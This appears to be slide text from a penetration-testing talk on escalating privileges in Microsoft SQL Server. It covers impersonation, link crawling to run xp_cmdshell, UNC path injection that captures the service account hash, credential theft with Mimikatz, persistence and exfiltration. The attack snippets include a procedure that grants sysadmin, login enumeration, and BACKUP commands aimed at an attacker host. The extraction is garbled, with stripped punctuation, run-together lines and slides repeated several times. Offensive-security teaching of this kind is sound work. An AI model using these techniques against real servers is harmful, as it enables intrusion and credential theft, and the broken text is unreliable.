Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
